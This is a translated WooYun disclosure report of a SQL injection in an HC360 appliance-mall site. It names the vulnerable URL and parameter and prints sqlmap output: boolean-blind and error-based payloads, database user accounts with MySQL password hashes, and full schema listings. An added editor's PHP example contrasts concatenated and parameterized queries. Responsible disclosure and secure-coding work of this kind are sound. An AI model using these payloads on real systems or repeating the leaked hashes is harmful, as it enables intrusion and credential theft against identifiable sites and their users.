Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0172428

Title: SQL injection in an HC360 (慧聪) site, exposing 20,000+ user records

Vendor: 慧聪网 (HC360)

Author: pudding2

Submitted: 2016-01-24 22:10

Fixed: 2016-03-08 21:29

Published: 2016-03-08 21:29

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-01-24: Details sent to the vendor, awaiting vendor action
2016-01-25: Vendor confirmed; details visible to the vendor only
2016-02-04: Details disclosed to core white hats and domain experts
2016-02-14: Details disclosed to regular white hats
2016-02-24: Details disclosed to intern white hats
2016-03-08: Details disclosed to the public

Summary:

An HC360 (慧聪) site has a SQL injection vulnerability exposing 20,000+ user records.

Details:

慧聪家电城 (the HC360 home appliance mall, hcjdc.com) has a SQL injection vulnerability exposing 27033 user records.
Vulnerable URL: http://www.hcjdc.com/pop_shop.php?act=show_store&store_id=200%27%3B
Injection point: store_id

sqlmap identified the following injection point(s) with a total of 366 HTTP(s) requests:
---
Parameter: store_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: act=show_store&store_id=-6061 OR 1964=1964#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: store_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: act=show_store&store_id=-6061 OR 1964=1964#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'jdmall'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: store_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: act=show_store&store_id=-6061 OR 1964=1964#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: act=show_store&store_id=-7338 OR 1 GROUP BY CONCAT(0x716a626a71,(SELECT (CASE WHEN (7737=7737) THEN 1 ELSE 0 END)),0x717a787671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
database management system users [11]:
[*] ''@'hcjdc'
[*] ''@'localhost'
[*] 'bj001'@'192.168.50.167'
[*] 'bj001'@'192.168.60.%'
[*] 'bj001'@'192.168.70.250'
[*] 'root'@'127.0.0.1'
[*] 'root'@'hcjdc'
[*] 'root'@'localhost'
[*] 'test2'@'localhost'
[*] 'wangheng2'@'%'
[*] 'wangheng2'@'58.252.73.135'
database management system users password hashes:
[*] bj001 [2]:
password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F
password hash: NULL
[*] root [2]:
password hash: *68A0D0586406B0933796F17C337E99BB02E07788
password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F
[*] test2 [1]:
password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA
[*] wangheng2 [2]:
password hash: *9C3676583D9E196A8F30AE407861C0BC9B8701FA
password hash: *FB176A387741ADC26EAF4A80028AE4AD83AF526F


Databases and tables:

back-end DBMS: MySQL 5
Database: hcjdmjcrm
[46 tables]
+---------------------------------------+
| crm_attendplace |
| crm_contact |
| crm_contract |
| crm_contract_attachment |
| crm_customer |
| crm_customer_industryissue |
| crm_customer_offlineactivity |
| crm_customer_spreadproject |
| crm_dealrecord |
| crm_follow |
| crm_industryissue |
| crm_invoice |
| crm_offlineactivity |
| crm_offlineactivityinviterecord |
| crm_order |
| crm_order_details |
| crm_product |
| crm_product_category |
| crm_receive |
| crm_spreadproject |
| crm_supplier |
| crm_supplierdealdetail |
| hr_department |
| hr_employee |
| hr_position |
| hr_post |
| param_city |
| param_sysparam |
| param_sysparam_type |
| personal_calendar |
| personal_notes |
| public_news |
| public_notice |
| sys_app |
| sys_authority |
| sys_button |
| sys_data_authority |
| sys_info |
| sys_log |
| sys_log_err |
| sys_menu |
| sys_online |
| sys_role |
| sys_role_emp |
| temp |
| tool_batch |
+---------------------------------------+
Database: jdmall
[196 tables]
+---------------------------------------+
| base_appendproperty |
| base_appendpropertyinstance |
| base_button |
| base_file |
| base_log |
| base_month |
| base_notice |
| base_o_a_setup |
| base_organization |
| base_recyclebin |
| base_roleright |
| base_roles |
| base_stafforganize |
| base_sysloginlog |
| base_sysmenu |
| base_usergroup |
| base_usergroupright |
| base_userinfo |
| base_userinfousergroup |
| base_userright |
| base_userrole |
| jd_account_log |
| jd_ad |
| jd_ad_custom |
| jd_ad_position |
| jd_admin_action |
| jd_admin_log |
| jd_admin_message |
| jd_admin_user |
| jd_adsense |
| jd_affiliate_log |
| jd_agency |
| jd_area_region |
| jd_article |
| jd_article_cat |
| jd_attribute |
| jd_auction_log |
| jd_auto_manage |
| jd_back_goods |
| jd_back_order |
| jd_bonus_log |
| jd_bonus_price |
| jd_bonus_type |
| jd_booking_goods |
| jd_brand |
| jd_brand_cat |
| jd_brand_copy |
| jd_cancel_goods_log |
| jd_card |
| jd_cart |
| jd_cat_recommend |
| jd_category |
| jd_category1 |
| jd_category2 |
| jd_check_log |
| jd_collect_goods |
| jd_comment |
| jd_compare_log |
| jd_crons |
| jd_delivery_goods |
| jd_delivery_order |
| jd_delivery_order_remark |
| jd_email_list |
| jd_email_sendlist |
| jd_entrust |
| jd_entrust_log |
| jd_error_log |
| jd_exchange_goods |
| jd_favourable_activity |
| jd_feedback |
| jd_free_sample |
| jd_friend_link |
| jd_goods |
| jd_goods_activity |
| jd_goods_article |
| jd_goods_attr |
| jd_goods_attr_log |
| jd_goods_cat |
| jd_goods_gallery |
| jd_goods_log |
| jd_goods_price_log |
| jd_goods_type |
| jd_goods_unit |
| jd_grab_address |
| jd_grab_area |
| jd_grab_site_info |
| jd_group_goods |
| jd_hc360_category |
| jd_house_cat |
| jd_keywords |
| jd_link_goods |
| jd_login_log_0 |
| jd_login_log_1 |
| jd_login_log_2 |
| jd_login_log_3 |
| jd_login_log_4 |
| jd_login_log_5 |
| jd_login_log_6 |
| jd_login_log_7 |
| jd_login_log_8 |
| jd_login_log_9 |
| jd_logistics |
| jd_mail_templates |
| jd_member_price |
| jd_mmt_shop_info |
| jd_mmt_shop_info_copy |
| jd_nav |
| jd_order_action |
| jd_order_goods |
| jd_order_info |
| jd_order_logistics |
| jd_pack |
| jd_package_goods |
| jd_pay_log |
| jd_payment |
| jd_plugins |
| jd_priceoff_activity |
| jd_priceoff_activity_log |
| jd_priceoff_goods |
| jd_products |
| jd_provider |
| jd_provider_product |
| jd_recommend_list |
| jd_reconciliation |
| jd_refund_goods |
| jd_refund_orders |
| jd_reg_confirm_log |
| jd_reg_extend_info |
| jd_reg_fields |
| jd_reg_sms_log |
| jd_region |
| jd_region_bak |
| jd_retailer_info |
| jd_role |
| jd_salesupport_request |
| jd_salesupport_response |
| jd_search_log |
| jd_searchengine |
| jd_server_edit_log |
| jd_server_info |
| jd_server_information |
| jd_server_logistics |
| jd_sessions |
| jd_sessions_data |
| jd_shield_city |
| jd_shipping |
| jd_shipping_area |
| jd_shop |
| jd_shop_cat |
| jd_shop_company_info |
| jd_shop_company_info_bat |
| jd_shop_config |
| jd_sms_extend_user |
| jd_sms_log |
| jd_snatch_log |
| jd_stats |
| jd_supplier_info |
| jd_suppliers |
| jd_tag |
| jd_template |
| jd_topic |
| jd_touch_activity |
| jd_touch_ad |
| jd_touch_ad_position |
| jd_touch_adsense |
| jd_touch_article |
| jd_touch_article_cat |
| jd_touch_auth |
| jd_touch_brand |
| jd_touch_category |
| jd_touch_feedback |
| jd_touch_goods |
| jd_touch_goods_activity |
| jd_touch_nav |
| jd_touch_payment |
| jd_touch_shop_config |
| jd_touch_topic |
| jd_touch_user_info |
| jd_user_account |
| jd_user_address |
| jd_user_bonus |
| jd_user_card_info |
| jd_user_feed |
| jd_user_key |
| jd_user_rank |
| jd_user_white_list |
| jd_users |
| jd_users_new |
| jd_virtual_card |
| jd_volume_price |
| jd_volume_price_log |
| jd_vote |
| jd_vote_log |
| jd_vote_option |
| jd_voucher |
| jd_wholesale |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+


Total rows in the user table: 27033

[Image: 5.jpg]

Proof of vulnerability:

[Image: 6.jpg]

[Image: 7.jpg]

Remediation:

Filter (sanitize) the input.
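The remediation above is a single word, so here is an added PHP example by the editor, not code from the report, from pudding2, or from hcjdc.com. It contrasts a store_id lookup built by string concatenation (the kind of handler that yields the boolean-blind and error-based findings sqlmap reported) with a version that validates the parameter as an integer and binds it in a prepared statement. The table `shop`, its columns, the `seed()` helper and the use of an in-memory SQLite database in place of the site's MySQL `jdmall` database are all assumptions made so the script runs stand-alone; against MySQL only the PDO DSN would change.

```php
<?php
// Added example (not code from the report or from hcjdc.com). An in-memory
// SQLite database stands in for the site's MySQL "jdmall" database so this
// runs stand-alone; the "shop" table and its columns are assumptions, not
// the site's real schema.

function seed(PDO $db): void {
    $db->exec("CREATE TABLE shop (store_id INTEGER PRIMARY KEY, name TEXT)");
    $db->exec("INSERT INTO shop VALUES (200, 'Example store A')");
    $db->exec("INSERT INTO shop VALUES (201, 'Example store B')");
}

// Vulnerable pattern: the query is assembled by concatenation, so whatever
// arrives in store_id is parsed as SQL. This is the shape of defect behind
// the report's boolean-blind and error-based payloads.
function showStoreVulnerable(PDO $db, string $storeId): array {
    $sql = "SELECT store_id, name FROM shop WHERE store_id = " . $storeId;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: check the type first, then bind the value so that it can
// only ever be data, never part of the statement.
function showStoreSafe(PDO $db, string $storeId): array {
    // store_id is an integer identifier; reject anything else before it
    // reaches the database layer. The "200';" probe from the report's URL
    // is refused here.
    if (!ctype_digit($storeId)) {
        throw new InvalidArgumentException("invalid store_id");
    }
    $stmt = $db->prepare("SELECT store_id, name FROM shop WHERE store_id = :id");
    $stmt->bindValue(':id', (int) $storeId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
seed($db);

// Well-formed input behaves the same in both versions: exactly one row.
echo "vulnerable, id 200: ", count(showStoreVulnerable($db, '200')), " row(s)\n";
echo "safe, id 200:       ", count(showStoreSafe($db, '200')), " row(s)\n";

// A tautology (the same idea as the report's "OR 1964=1964") makes the
// concatenated query match every row; the hardened version refuses the
// input before any query is run.
echo "vulnerable, tautology: ", count(showStoreVulnerable($db, '-1 OR 1=1')), " row(s)\n";
try {
    showStoreSafe($db, '-1 OR 1=1');
} catch (InvalidArgumentException $e) {
    echo "safe, tautology: rejected (", $e->getMessage(), ")\n";
}
```

Validation alone ("filtering") is the weaker half of the fix: a character blocklist can be bypassed or can break legitimate input, whereas a bound parameter is never interpreted as SQL whatever it contains, so both checks belong in the handler. The sqlmap output above also shows the application connecting as 'root@localhost' with DBA rights, which is why one injected GET parameter reached the password hashes of every account in the mysql database; a dedicated application account restricted to the jdmall tables it needs would have kept the blast radius to that one database.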

Copyright notice: when reposting, please credit the source: pudding2@乌云 (WooYun)


Vendor response

Vendor reply:

Severity: Medium

Rank: 8

Confirmed: 2016-01-25 10:57

Vendor comment:

Thank you.

Latest status:

None yet


Comments:

  1. 2016-01-24 23:57 | 残雪 (Intern white hat | Rank: 34, vulnerabilities: 7 | "a nobody who's good at talking nonsense")

    Some things are better left untouched.